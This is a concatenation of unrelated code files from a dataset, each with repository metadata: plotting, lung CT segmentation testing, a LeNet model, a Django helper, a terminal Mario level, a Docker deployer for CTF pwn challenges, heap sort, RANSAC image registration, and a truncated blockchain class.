plt.xlabel('# Epoch', fontsize=ticksize)
plt.ylabel('Top1 - Accuracy', fontsize=ticksize)
plt.yticks(fontsize=ticksize)
plt.xticks(fontsize=ticksize)
plt.legend(loc='lower right', fontsize=legendsize)
plt.show()
# sgd = read_csv("csv/results.csv")
# plt.plot(sgd[:, 0] * 1.5, 100.0 - sgd[:, 4], 'black', label='SGD', linestyle='--', marker='s')
# hsq = read_csv("csv/val_accuracy.csv")
# plt.plot( 1.28 * (hsq[:, 0] + 1), hsq[:, 1] * 100.0, 'red', label='HSQ', linestyle='-', marker='x')
linewidth = 1
sgd = read_csv("sgd_32bit/csv/val_accuracy.csv")
plt.plot( (sgd[:, 0] + 1), sgd[:, 1] * 100.0, 'black', label='SGD', linestyle='--', marker='x', linewidth=linewidth)
hsq = read_csv("nnq_d8_k256/csv/val_accuracy.csv")
plt.plot( (hsq[:, 0] + 1), hsq[:, 1] * 100.0, 'red', label='HSQ', linestyle='-', marker='s', linewidth=linewidth)
_plot_setting()
| 2.703125
| 3
|
test_lung_seg_scan_luna.py
|
Aryan98/lcprediction
| 0
|
12783470
|
import sys
import lasagne as nn
import numpy as np
import theano
import pathfinder
import utils
from configuration import config, set_configuration
from utils_plots import plot_slice_3d_4
import theano.tensor as T
import blobs_detection
import logger
import time
import multiprocessing as mp
import buffering
theano.config.warn_float64 = 'raise'
if len(sys.argv) < 2:
sys.exit("Usage: test_luna_scan.py <configuration_name>")
config_name = sys.argv[1]
set_configuration('configs_seg_scan', config_name)
# predictions path
predictions_dir = utils.get_dir_path('model-predictions', pathfinder.METADATA_PATH)
outputs_path = predictions_dir + '/%s' % config_name
utils.auto_make_dir(outputs_path)
# logs
logs_dir = utils.get_dir_path('logs', pathfinder.METADATA_PATH)
sys.stdout = logger.Logger(logs_dir + '/%s.log' % config_name)
sys.stderr = sys.stdout
data_iterator = config().train_data_iterator
print
print 'Data'
print 'n samples: %d' % data_iterator.nsamples
start_time = time.time()
n_pos = 0
tp = 0
for n, (ct, lung_mask, annotations, tf_matrix, pid) in enumerate(data_iterator.generate()):
print '-------------------------------------'
print n, pid
n_pos += annotations.shape[0]
n_pid_tp = 0
annotations = np.int32(annotations)
for i in xrange(annotations.shape[0]):
if lung_mask[0, 0, annotations[i, 0], annotations[i, 1], annotations[i, 2]] == 1:
n_pid_tp += 1
tp += n_pid_tp
print annotations.shape[0], n_pid_tp
if annotations.shape[0] > n_pid_tp:
print '----HERE-----!!!!!'
print 'total', n_pos
print 'detected', tp
| 1.796875
| 2
|
src/networks/lenet.py
|
francesco-p/FACIL
| 243
|
12783471
|
from torch import nn
import torch.nn.functional as F
class LeNet(nn.Module):
"""LeNet-like network for tests with MNIST (28x28)."""
def __init__(self, in_channels=1, num_classes=10, **kwargs):
super().__init__()
# main part of the network
self.conv1 = nn.Conv2d(in_channels, 6, 5)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 16, 120)
self.fc2 = nn.Linear(120, 84)
# last classifier layer (head) with as many outputs as classes
self.fc = nn.Linear(84, num_classes)
# and `head_var` with the name of the head, so it can be removed when doing incremental learning experiments
self.head_var = 'fc'
def forward(self, x):
out = F.relu(self.conv1(x))
out = F.max_pool2d(out, 2)
out = F.relu(self.conv2(out))
out = F.max_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = F.relu(self.fc1(out))
out = F.relu(self.fc2(out))
out = self.fc(out)
return out
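
# Minimal smoke test (added sketch, not from the original repo): pushes a dummy
# MNIST-sized batch through the network to check the expected output shape.
if __name__ == '__main__':
    import torch
    net = LeNet()
    dummy = torch.randn(2, 1, 28, 28)  # batch of 2 single-channel 28x28 images
    out = net(dummy)
    print(out.shape)  # expected: torch.Size([2, 10])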
| 3.421875
| 3
|
shop/contexts.py
|
lbacon17/lb-fitness
| 0
|
12783472
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from .models import Product
def favourites(request):
    """Context processor that iterates through the favourite items"""
favourite_items = []
shop_items = Product.objects.all()
for item in shop_items:
        shop_item = get_object_or_404(Product, pk=item.pk)
favourite_items.append(shop_item)
context = {
'favourite_items': favourite_items,
}
return context
| 1.976563
| 2
|
mymario/level1_map.py
|
sriteja777/My_Mario
| 1
|
12783473
|
<filename>mymario/level1_map.py<gh_stars>1-10
"""
A module containing class for level 1 map
"""
from random import randrange
from irregular import print_cloud, IrregularObjects
from map import Map
from motion import MovingBridges, Enemies
from objects import Obj, Extras
import config
from music import Music
msc = Music()
def get_extra():
"""
Returns any random extra point when PLAYER_OBJ touches extra bridges
:return: Returns the string of extra point
"""
num = randrange(0, 3)
if num == 0:
return config.TIME
if num == 1:
return config.LOVE
# x = 2
return config.STONE
class Level1Map(Map):
"""
A class for level 1
"""
def __init__(self, map_id, rows, columns):
"""
Initialises various attributes of level 1
:param columns:
:param rows:
"""
Map.__init__(self, map_id, columns, rows, 5*columns)
self.fishes = []
self.moving_bridges = []
self.sub_holes = []
self.thrones = []
self.clouds = []
self.lake = None
self.stones = []
self.extras = []
self.pole = None
self.lives = []
self.up_wall = None
self.down_wall = None
print(self.length, self.columns, self.rows)
print(config.MAP_LENGTH, config.COLUMNS, config.ROWS)
self.create_walls()
self.create_clouds()
self.create_pole()
self.create_lake_fishes()
self.create_bridges()
self.create_moving_bridges()
self.create_holes()
self.create_coins()
self.create_enemies()
self.create_extras()
self.initial_player_position = {'max_x': 4, 'max_y': self.up_wall.min_y - 1, 'min_x': 3, 'min_y': self.up_wall.min_y - 2}
self.create_checkpoints()
self.player_crossed_start = False
self.player_crossed_lake = False
self.player_crossed_thrones = False
# self.music_conf = [{}]
def control_music(self, player_loc):
if not self.player_crossed_start and \
player_loc > self.holes[2].max_x:
self.player_crossed_start = True
msc.play_music_for_action('Player at lake', change=True)
if not self.player_crossed_lake and player_loc > self.lake.max_x:
self.player_crossed_lake = True
msc.play_music_for_action('Player at thrones', change=True)
if not self.player_crossed_thrones and \
player_loc > self.thrones[0].max_x:
self.player_crossed_thrones = True
msc.play_music_for_action('Player at end', change=True)
def create_checkpoints(self):
"""
Dependencies: initial player position, walls, holes, lakes
:return:
"""
self.checkpoints.append((self.initial_player_position['min_x'], self.initial_player_position['max_y']))
self.checkpoints.append((self.columns, self.up_wall.min_y - 1))
self.checkpoints.append((self.holes[1].max_x + 4, self.up_wall.min_y - 1))
self.checkpoints.append((self.holes[2].max_x + 4, self.up_wall.min_y - 1))
self.checkpoints.append((self.lake.max_x + 1, self.up_wall.min_y - 1))
def create_enemies(self):
"""
Dependencies: Holes, bridges, lakes, walls
"""
self.enemies.append(Enemies(self.sub_holes[0].max_x - 2, self.sub_holes[0].max_y,
self.sub_holes[0].max_x - 3,
self.sub_holes[0].max_y - 1, config.ENEMY,
self.sub_holes[0].min_x,
self.sub_holes[0].max_x - 2, self))
self.enemies.append(
Enemies(self.holes[1].min_x - 1, self.up_wall.min_y - 1, self.holes[1].min_x - 2,
self.up_wall.min_y - 2,
config.ENEMY, self.bridges[2].max_x + 1, self.holes[1].min_x - 1, self))
self.enemies.append(
Enemies(self.bridges[3].max_x, self.bridges[3].min_y - 1, self.bridges[3].max_x - 1,
self.bridges[3].min_y - 2, config.ENEMY, self.bridges[3].min_x,
self.bridges[3].max_x, self))
# Create enemies and bridges on lake
mid = int((self.lake.min_x + self.lake.max_x) / 2)
print(self.lake.min_y, self.lake.max_y)
# print('x_pos -> ', c.LAKES[0].min_x + 5, mid, 10)
# print('y_pos-> ', c.LAKES[0].min_y - 5, c.TOP - 3, int(c.ROWS / 10))
# sleep(3)
min_y = int(config.TOP + self.rows / 10)
for x_pos, y_pos in zip(range(self.lake.min_x + 5, mid, 10),
range(self.lake.min_y - 5, min_y, -int(self.rows / 10))):
self.bridges.append(Obj(x_pos + 3, y_pos, x_pos - 3, y_pos - 1, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(x_pos - 3, x_pos + 3)
self.enemies.append(
Enemies(rand_x + 1, y_pos - 2, rand_x, y_pos - 3, config.ENEMY, x_pos - 3, x_pos + 3, self))
store = self.bridges[-1]
self.enemies[-1].kill()
self.enemies.append(Enemies(store.max_x, store.min_y - 1, store.max_x - 1,
store.min_y - 2, config.ENEMY, store.max_x - 1, store.max_x, self))
for x_pos, y_pos in zip(range(self.lake.max_x - 5, mid, -10),
range(self.lake.min_y - 5, min_y, -int(self.rows / 10))):
self.bridges.append(Obj(x_pos + 3, y_pos, x_pos - 3, y_pos - 1, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(x_pos - 3, x_pos + 3)
self.enemies.append(
Enemies(rand_x + 1, y_pos - 2, rand_x, y_pos - 3, config.ENEMY, x_pos - 3, x_pos + 3, self))
store_2 = self.bridges[-1]
self.bridges.append(Obj(store_2.min_x, store.max_y, store.max_x, store.min_y, config.BRIDGE, self.map_array, self.object_array))
self.enemies[-1].kill()
self.enemies.append(Enemies(store_2.min_x + 1, store_2.min_y - 1, store_2.min_x,
store_2.min_y - 2, config.ENEMY, store_2.min_x, store_2.min_x + 1, self))
mid = int((store.max_x + store_2.min_x) / 2)
self.lives.append(Obj(mid, config.TOP, mid, config.TOP, config.LOVE, self.map_array, self.object_array))
def create_coins(self):
# Dependencies: Bridges, walls, holes
mid = int((self.bridges[0].min_x + self.bridges[0].max_x) / 2)
self.coins.append(
Obj(mid, self.bridges[0].min_y - 1, mid, self.bridges[0].min_y - 1, config.COIN, self.map_array, self.object_array))
mid = int((self.bridges[1].min_x + self.bridges[1].max_x) / 2)
for x_pos, y_pos in zip(range(mid - 4, mid + 2, 2),
range(self.bridges[1].min_y - 1, self.bridges[1].min_y - 4, -1)):
self.coins.append(Obj(x_pos, y_pos, x_pos, y_pos, config.COIN, self.map_array, self.object_array))
for x_pos, y_pos in zip(range(mid + 2, mid + 8, 2),
range(self.bridges[1].min_y - 2, self.bridges[1].min_y, 1)):
self.coins.append(Obj(x_pos, y_pos, x_pos, y_pos, config.COIN, self.map_array, self.object_array))
self.coins.append(Obj(self.sub_holes[0].max_x, self.sub_holes[0].max_y, self.sub_holes[0].max_x, self.sub_holes[0].max_y, config.TIME, self.map_array, self.object_array))
for x_pos in range(self.holes[0].max_x + 5, self.bridges[2].min_x - 5, 3):
self.coins.append(Obj(x_pos, self.up_wall.min_y - 1, x_pos, self.up_wall.min_y - 1, config.COIN, self.map_array, self.object_array))
def create_holes(self):
# Dependencies: walls, bridges
rand_x = randrange(int(self.columns / 3), int((2 * self.columns) / 3))
self.holes.append(Obj(rand_x + 5, self.down_wall.max_y - 2, rand_x, self.up_wall.min_y, ' ', self.map_array, self.object_array))
self.sub_holes.append(Obj(self.holes[0].max_x + 10, self.holes[0].max_y, self.holes[0].min_x, self.up_wall.min_y + 2, ' ', self.map_array, self.object_array))
rand_x = randrange(int((4 * self.columns) / 3) + 4, int(5 * self.columns / 3) - 4)
self.holes.append(Obj(rand_x + 4, self.rows, rand_x - 4, self.up_wall.min_y, ' ', self.map_array, self.object_array))
self.holes.append(Obj(self.bridges[5].max_x + 24, self.rows, self.bridges[5].max_x + 1, self.up_wall.min_y, ' ', self.map_array, self.object_array))
def create_extras(self):
# Dependencies: bridges
mid = int((self.bridges[1].min_x + self.bridges[1].max_x) / 2)
self.extras.append(
Extras(mid + 1, self.bridges[1].max_y, mid - 1, self.bridges[1].min_y,
config.EXTRAS_BRIDGE,
get_extra(), self.map_array, self.object_array))
mid = int((self.bridges[3].min_x + self.bridges[3].max_x) / 2)
self.extras.append(
Extras(mid + 1, self.bridges[3].max_y, mid - 1, self.bridges[3].min_y,
config.EXTRAS_BRIDGE,
get_extra(), self.map_array, self.object_array))
def create_bridges(self):
# Dependencies: walls
self.bridges.append(Obj(20, self.up_wall.min_y - 5, 14, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
self.bridges.append(Obj(40, self.up_wall.min_y - 5, 25, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
self.bridges.append(Obj(self.columns - 4, self.up_wall.min_y - 1, self.columns - 10, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(self.columns + 5, int(4 * self.columns / 3) - 5)
self.bridges.append(Obj(5 + rand_x, self.up_wall.min_y - 5, rand_x - 5, self.up_wall.min_y - 8, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(int(5 * self.columns / 3) + 1, 2 * self.columns - 2)
self.bridges.append(Obj(rand_x + 1, self.up_wall.min_y - 6, rand_x - 1, self.up_wall.min_y - 8, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(2 * self.columns + 6, int((7 * self.columns) / 3) - 6)
cross_bridge_list = [[' ' for _ in range(0, 15)] for _ in range(0, 15)]
for x_pos in range(0, 15):
for y_pos in range(15 - x_pos, 15):
cross_bridge_list[x_pos][y_pos] = config.BRIDGE
self.bridges.append(IrregularObjects({'max_x': rand_x + 6, 'max_y': self.up_wall.min_y - 1, 'min_x': rand_x - 6,'min_y': self.up_wall.min_y - 14}, cross_bridge_list, self.map_array, self.object_array))
def create_lake_fishes(self):
# Dependencies: walls
min_x = int(8 * self.columns / 3)
max_x = int(11 * self.columns / 3)
self.lake = Obj(max_x, self.down_wall.max_y - 1, min_x, self.up_wall.max_y, config.WATER, self.map_array, self.object_array)
rand_x = randrange(self.lake.min_x + 2, self.lake.max_x - 2)
rand_y = self.lake.min_y + randrange(1, 4)
self.fishes.append(Obj(rand_x, rand_y, rand_x, rand_y, config.FISH, self.map_array, self.object_array))
rand_x = randrange(self.lake.min_x + 2, self.lake.max_x - 2)
rand_y = self.lake.min_y + randrange(1, 4)
self.fishes.append(Obj(rand_x, rand_y, rand_x, rand_y, config.FISH, self.map_array, self.object_array))
def create_moving_bridges(self):
# Dependencies: walls, lake
min_x = int((11 * self.columns) / 3) + 7
length = 15
max_x = int((9 * self.columns) / 2)
# Create Knifes
self.thrones.append(Obj(max_x, self.up_wall.max_y + 1, min_x, self.up_wall.max_y, config.THRONES, self.map_array, self.object_array))
min_y = config.TOP + 5
max_y = self.lake.min_y - 5
for x_pos in range(min_x, max_x, 25):
rand_y = randrange(min_y, max_y + 1)
self.moving_bridges.append(
MovingBridges(x_pos + length, rand_y, x_pos, rand_y,
config.MOVING_BRIDGES, config.TOP + 5, self.lake.min_y - 5, self))
def create_walls(self):
# Dependencies: None
self.down_wall = Obj(self.length, self.rows, 1, int((9 * self.rows) / 10), config.DOWN_WALL, self.map_array, self.object_array)
self.up_wall = Obj(self.length, self.down_wall.min_y - 1, 1, self.down_wall.min_y - 1, config.UP_WALL, self.map_array, self.object_array)
def create_clouds(self):
# Dependencies: None
cloud = print_cloud()
rand_x = randrange(1, self.columns)
rand_x_2 = randrange(self.columns, 2 * self.columns)
rand_x_3 = randrange(2 * self.columns, 3 * self.columns)
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x, 'max_y': 5 + len(cloud), 'min_x': rand_x, 'min_y': 1},
cloud, self.map_array, self.object_array))
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x_2, 'max_y': 4 + len(cloud), 'min_x': rand_x_2,
'min_y': 2},
cloud, self.map_array, self.object_array))
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x_3, 'max_y': 6 + len(cloud), 'min_x': rand_x_3,
'min_y': 1},
cloud, self.map_array, self.object_array))
def create_pole(self):
# Dependencies: Walls
self.pole = Obj(self.length - 5, self.up_wall.min_y - 1, self.length - 5, self.up_wall.min_y - 15, '|', self.map_array, self.object_array)
def get_features(self):
"""
Get Features of map
:return:
"""
# Override to print a readable string presentation of your object
# below is a dynamic way of doing this without explicity constructing the string manually
return ', '.join(
['{key}={value}'.format(key=key, value=self.__dict__.get(key)) for key in
self.__dict__]
)
if __name__ == '__main__':
TED = Level1Map(1, 2, 10)
print(TED.get_features())
| 3.40625
| 3
|
serve.py
|
racterub/ctfdeployer
| 3
|
12783474
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2019-05-31 00:14:27
# @Author : Racter (<EMAIL>)
# @Profile : https://racterub.me
import yaml
from argparse import ArgumentParser
import os
import sys
import shutil
from subprocess import check_output
def parseParam():
parser = ArgumentParser()
parser.add_argument("-d", "--dir", help="Path to challenges", default="chal/", dest="path")
parser.add_argument("-p", "--port", help="Pwn challenges' starting port (Default => 6000)", type=int, default=6000, dest="port")
parser.add_argument("-i", "--img", help="Docker base image for your pwn challenges (Default => ubuntu:18.04) or do just do <img>:<tag>", default="ubuntu:18.04", dest="image")
parser.add_argument("-t", "--timeout", help="Set timeout limit", default=0, dest="time")
parser.add_argument("-g", "--gen-conf", help="Generate docker-compose.yml", action="store_true", dest="gen_conf")
parser.add_argument("-e", "--ex-libc", help="Export libc from container", action="store_true", dest="ex_libc")
args = parser.parse_args()
return args
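# Illustrative invocations (added sketch, based only on the flags defined above):
#   python3 serve.py --dir chal/ --port 6000 --img ubuntu:18.04 --timeout 30
#   python3 serve.py --dir chal/ --gen-conf    # only regenerate docker-compose.yml
#   python3 serve.py --dir chal/ --ex-libc     # copy libc out of the running containers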
def genConf(path, port, image, timeout):
config = {"services": {}}
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
for i in range(len(chal)):
baseDir = base + chal[i]
data = {"build": "chal/%s" % chal[i], "ulimits": {"nproc": 1024}, "ports": ["%d:9999" % port]}
config['services'][chal[i]] = data
port += 1
with open('docker-compose.yml', 'w') as f:
f.write(yaml.dump({"version": '3'}) + yaml.dump(config))
def exportLibc(path, port, image, timeout):
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
os.mkdir('libc/')
for i in range(len(chal)):
os.mkdir("libc/%s" % chal[i])
containerID = check_output('docker ps -aqf "name=pwndeployer_%s"' % chal[i], shell=True).strip().decode()
os.system("docker cp --follow-link %s:lib32/libc.so.6 libc/%s/lib32" % (containerID, chal[i]))
os.system("docker cp --follow-link %s:lib/x86_64-linux-gnu/libc.so.6 libc/%s/lib64" % (containerID, chal[i]))
def setup(path, port, image, timeout):
config = {"services": {}}
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
for i in range(len(chal)):
baseDir = base + chal[i]
os.mkdir(baseDir+"/bin/")
dockerfile = """FROM %s
RUN apt-get update && apt-get -y dist-upgrade
RUN apt-get install -y lib32z1 xinetd
RUN useradd -m ctf
COPY ./bin/ /home/ctf/
COPY ./ctf.xinetd /etc/xinetd.d/ctf
COPY ./start.sh /start.sh
RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail
RUN chmod +x /start.sh
RUN chown -R root:ctf /home/ctf
RUN chmod -R 750 /home/ctf
RUN chmod 740 /home/ctf/flag
RUN cp -R /lib* /home/ctf
RUN cp -R /usr/lib* /home/ctf
RUN mkdir /home/ctf/dev
RUN mknod /home/ctf/dev/null c 1 3
RUN mknod /home/ctf/dev/zero c 1 5
RUN mknod /home/ctf/dev/random c 1 8
RUN mknod /home/ctf/dev/urandom c 1 9
RUN chmod 666 /home/ctf/dev/*
RUN mkdir /home/ctf/bin
RUN cp /bin/sh /home/ctf/bin
RUN cp /bin/ls /home/ctf/bin
RUN cp /bin/cat /home/ctf/bin
RUN cp /usr/bin/timeout /home/ctf/bin
WORKDIR /home/ctf
CMD ["/start.sh"]
EXPOSE 9999
""" % image
with open('xinetd_setting', 'r') as setting:
ctfXinetd = setting.read()
if timeout:
runsh = '''#!/bin/sh
exec 2>/dev/null
timeout %d ./%s''' % (timeout, chal[i])
else:
            runsh = '''#!/bin/sh
exec 2>/dev/null
./%s''' % chal[i]
shutil.move(baseDir+"/%s" % chal[i], baseDir+'/bin/')
shutil.move(baseDir+"/flag", baseDir+'/bin/')
os.chmod(baseDir+'/bin/%s' % chal[i], 0o755)
with open('start.sh') as f:
startsh = f.read()
with open(baseDir+'/start.sh', 'w') as f:
f.write(startsh)
with open(baseDir+'/Dockerfile', 'w') as f:
f.write(dockerfile)
with open(baseDir+'/bin/run.sh', 'w') as f:
f.write(runsh)
with open(baseDir+'/ctf.xinetd', 'w') as f:
f.write(ctfXinetd)
data = {"build": "chal/%s" % chal[i], "ulimits": {"nproc": 1024}, "ports": ["%d:9999" % port]}
config['services'][chal[i]] = data
port += 1
with open('docker-compose.yml', 'w') as f:
f.write(yaml.dump({"version": '3'}) + yaml.dump(config))
if __name__ == "__main__":
arg = parseParam()
if os.path.isdir(arg.path):
if arg.gen_conf:
genConf(arg.path, arg.port, arg.image, arg.time)
elif arg.ex_libc:
exportLibc(arg.path, arg.port, arg.image, arg.time)
else:
setup(arg.path, arg.port, arg.image, arg.time)
else:
print("Invalid input")
sys.exit(-1)
| 2.21875
| 2
|
sort-algorithm/heap_sort.py
|
free-free/Algorithm
| 7
|
12783475
|
<filename>sort-algorithm/heap_sort.py
# -*- coding:utf-8 -*-
import numpy as np
class MaxHeap(object):
def __init__(self, sz, data):
self.sz = sz
self.cnt = len(data)
self.heap = [0] * (self.sz + 1)
        self.heap[1 : self.cnt + 1] = data
self.build_heap()
def build_heap(self):
last_no_leaf = self.cnt // 2
for i in range(last_no_leaf, 0, -1):
self.heaplify(self.heap, self.cnt, i)
def heaplify(self, heap, cnt, ind):
while True:
max_pos = ind
if 2 * ind <= cnt and heap[2 * ind] > heap[max_pos]:
max_pos = 2 * ind
if (2 * ind + 1) <= cnt and heap[2 * ind + 1] > heap[max_pos]:
max_pos = 2 * ind + 1
if max_pos == ind:
break
heap[max_pos], heap[ind] = heap[ind], heap[max_pos]
ind = max_pos
def remove_max(self):
if self.cnt == 0:
return -1
max_val = self.heap[1]
self.heap[1] = self.heap[self.cnt]
self.heap[self.cnt] = 0
self.cnt -= 1
self.heaplify(self.heap, self.cnt, 1)
return max_val
def insert(self, item):
if self.cnt >= self.sz:
return -1
self.cnt += 1
self.heap[self.cnt] = item
i = self.cnt
while (i // 2) > 0 and self.heap[i // 2] < self.heap[i]:
self.heap[i // 2], self.heap[i] = self.heap[i], self.heap[i // 2]
i = i // 2
def heap_sort(data):
heap = MaxHeap(len(data), data)
k = heap.cnt
while k >= 1:
heap.heap[1], heap.heap[k] = heap.heap[k], heap.heap[1]
k -= 1
heap.heaplify(heap.heap, k, 1)
    return heap.heap[1 : heap.cnt + 1]
if __name__ == '__main__':
data = np.random.randint(0, 100, 10)
print(data)
print(heap_sort(data))
# heap = MaxHeap(20, data)
# print(heap.heap)
# print(heap.remove_max())
# print(heap.heap)
# heap.insert(1000)
# print(heap.heap)
| 3.84375
| 4
|
ransac.py
|
vishwa91/pyimreg
| 63
|
12783476
|
<gh_stars>10-100
#!/usr/bin/env python
from scipy import *
from scipy.linalg import *
from scipy.special import *
from random import choice
from PIL import Image
import os
import sys
from sift import *
from homography import *
import pdb
# New version coming soon.
def get_points(locs1, locs2, matchscores):
'''
Return the corresponding points in both the images
'''
plist = []
t = min(len(locs1), len(locs2))
for i in range(len(matchscores)):
if (matchscores[i] > 0):
y1 = int(locs1[i, 1])
x1 = int(locs1[i, 0])
y2 = int(locs2[int(matchscores[i]), 1])
x2 = int(locs2[int(matchscores[i]), 0])
plist.append([[x1,y1],[x2,y2]])
return plist
def get_homography(points_list):
'''
Function to quickly compute a homography matrix from all point
correspondences.
Inputs:
points_list: tuple of tuple of tuple of correspondence indices. Each
entry is [[x1, y1], [x2, y2]] where [x1, y1] from image 1 corresponds
to [x2, y2] from image 2.
Outputs:
H: Homography matrix.
'''
    fp = ones((len(points_list), 3))
    tp = ones((len(points_list), 3))
    for idx in range(len(points_list)):
        fp[idx, 0] = points_list[idx][0][0]
        fp[idx, 1] = points_list[idx][0][1]
        tp[idx, 0] = points_list[idx][1][0]
        tp[idx, 1] = points_list[idx][1][1]
H = Haffine_from_points(fp.T, tp.T)
return H
def ransac(im1, im2, points_list, iters = 10 , error = 10, good_model_num = 5):
'''
This function uses RANSAC algorithm to estimate the
shift and rotation between the two given images
'''
if ndim(im1) == 2:
rows,cols = im1.shape
else:
rows, cols, _ = im1.shape
model_error = 255
model_H = None
for i in range(iters):
consensus_set = []
points_list_temp = copy(points_list).tolist()
# Randomly select 3 points
for j in range(3):
temp = choice(points_list_temp)
consensus_set.append(temp)
points_list_temp.remove(temp)
# Calculate the homography matrix from the 3 points
fp0 = []
fp1 = []
fp2 = []
tp0 = []
tp1 = []
tp2 = []
for line in consensus_set:
fp0.append(line[0][0])
fp1.append(line[0][1])
fp2.append(1)
tp0.append(line[1][0])
tp1.append(line[1][1])
tp2.append(1)
fp = array([fp0, fp1, fp2])
tp = array([tp0, tp1, tp2])
H = Haffine_from_points(fp, tp)
# Transform the second image
# imtemp = transform_im(im2, [-xshift, -yshift], -theta)
# Check if the other points fit this model
for p in points_list_temp:
x1, y1 = p[0]
x2, y2 = p[1]
A = array([x1, y1, 1]).reshape(3,1)
B = array([x2, y2, 1]).reshape(3,1)
out = B - dot(H, A)
dist_err = hypot(out[0][0], out[1][0])
if dist_err < error:
consensus_set.append(p)
# Check how well is our speculated model
if len(consensus_set) >= good_model_num:
dists = []
for p in consensus_set:
x0, y0 = p[0]
x1, y1 = p[1]
A = array([x0, y0, 1]).reshape(3,1)
B = array([x1, y1, 1]).reshape(3,1)
out = B - dot(H, A)
dist_err = hypot(out[0][0], out[1][0])
dists.append(dist_err)
if (max(dists) < error) and (max(dists) < model_error):
model_error = max(dists)
model_H = H
return model_H
if __name__ == "__main__":
try:
os.mkdir("temp")
except OSError:
pass
try:
# Load images from command prompt
im1 = Image.open(sys.argv[1])
im2 = Image.open(sys.argv[2])
except IndexError:
print('Usage: python ransac.py image1 image2')
sys.exit()
im1.convert('L').save('temp/1.pgm')
im2.convert('L').save('temp/2.pgm')
im1 = asarray(im1)
im2 = asarray(im2)
process_image('temp/1.pgm', 'temp/1.key')
process_image('temp/2.pgm', 'temp/2.key')
key1 = read_features_from_file('temp/1.key')
key2 = read_features_from_file('temp/2.key')
score = match(key1[1], key2[1])
plist = get_points(key1[0], key2[0], score)
plot_matches(im1,im2,key1[0],key2[0],score)
# Compare ransac and simple homography matrix
out_ransac = ransac(im1, im2, plist)
out_simple = get_homography(plist)
H_ransac = inv(out_ransac)
H_simple = inv(out_simple)
im_ransac = affine_transform2(im1,
H_ransac[:2, :2],
[H_ransac[0][2], H_ransac[1][2]])
im_simple = affine_transform2(im1,
H_simple[:2, :2],
[H_simple[0][2], H_simple[1][2]])
Image.fromarray(im2).show()
Image.fromarray(im_ransac).show()
Image.fromarray(im_simple).show()
| 2.6875
| 3
|
modules/blockchain/blockchain.py
|
zeddo123/OpenBook
| 12
|
12783477
|
import copy as cp
from pprint import pprint as pp
from termcolor import colored
from modules.blockchain.block import *
from modules.blockchain.book import *
from modules.blockchain.transaction import *
class BlockChain:
"""BlockChain Object to be added to the chain
:Attributes:
:attr block_chain: All the blocks in the chain
:type block_chain: list
:attr open_transaction: All the transactions to be added
:type open_transaction: list
:Methods:
:meth __init__: Constructor of the class
:meth to_json: Create a json file of the block-chain
:meth valid_proof: Verify the hash guess
:meth proof_of_work: Calculate the hash of the block and return nonce
:meth create_append_transaction: Create and append a transaction to the open transaction list
:meth mine_block: mine the new block + add the reward transaction
:meth number_blocks: gives number of block in the chain
:meth __str__: magic method, prints the chain and its blocks
"""
def __init__(self, override=False, debug=True):
"""Constructor of the class"""
# Create the genesis block (the first block in the chain)
if not override:
genesis_block = Block(None,
[Transaction(sender=None, recipient='BlockChain', book=None, transaction_type=2)])
self.block_chain = [genesis_block]
else:
genesis_block = None
self.block_chain = []
# a list containing all the forks of a chain at the same level
self.chains_same_level = [self.block_chain]
self.open_transactions = []
self.debug = debug
def valid_proof(self, last_hash, nonce):
"""Verify the hash guess
:param last_hash: the hash of the previous block in the chain
:type last_hash: str
:param nonce: nonce guess of the hash
:type nonce: int
:returns: True or False guess_hash
:rtype: bool
"""
guess = (str(list(map(str, self.open_transactions))) + str(last_hash) + str(nonce)).encode()
guess_hash = hashlib.sha256(guess).hexdigest()
# print(guess_hash)
return guess_hash[0:2] == '42' # 42 is the difficulty to find the hash
def proof_of_work(self):
"""Search for the right hash by adjusting the `nonce` value
:var nonce: field whose value is adjusted by miners so that the hash of
the block will be the current target (for now it's 42 as the first two chars) of the network
:type nonce: int
:returns: nonce of the hash
:rtype: int
"""
last_block = self.block_chain[-1]
last_hash = last_block.hash
nonce = 0
while not self.valid_proof(last_hash, nonce):
nonce += 1
return nonce
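    # Illustrative note (added, not in the original source): the nonce returned by
    # `proof_of_work` is exactly the value that makes `valid_proof` succeed for the
    # current open transactions, e.g.
    #   nonce = blockchain.proof_of_work()
    #   assert blockchain.valid_proof(blockchain.block_chain[-1].hash, nonce)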
# TODO: change the name of this method
def create_append_transaction(self, new_transaction):
"""This method create a transaction and append it to the Open transaction attr
:param new_transaction: new transaction
:type new_transaction: Transaction object -> *`modules.blockchain.transaction`*
:returns: None
"""
if self.verify_transaction(new_transaction):
self.open_transactions.append(new_transaction)
    def verify_transaction(self, new_transaction):  # TODO: complete this method with real validation rules
        # Accept every transaction for now so that create_append_transaction actually queues it.
        return True
@staticmethod
def verify_blockchain(blockchain, flag_list=False):
"""Verify if a block-chain hasn't been tampered with
loop through the block and verify the difference between the hashes
:param blockchain: the block-chain to be verified
:type blockchain: BlockChain *-blockchain.py*
:returns: the chain is valid or not
:rtype: {bool}
"""
if not flag_list:
block_chain = blockchain.block_chain
else:
block_chain = blockchain
flags = []
for i in range(1, len(block_chain)):
block = block_chain[i]
block1 = block_chain[i - 1]
if block.hash != block.hash_block():
flags.append("[!] Found difference between the hash and the calculated one")
elif block1.hash != block.previous_hash:
flags.append("[!] Found difference between the hash of a block and the one previous")
elif block1.timestamp >= block.timestamp:
flags.append("[!] Found irregularity between the time-stamps")
if not flag_list:
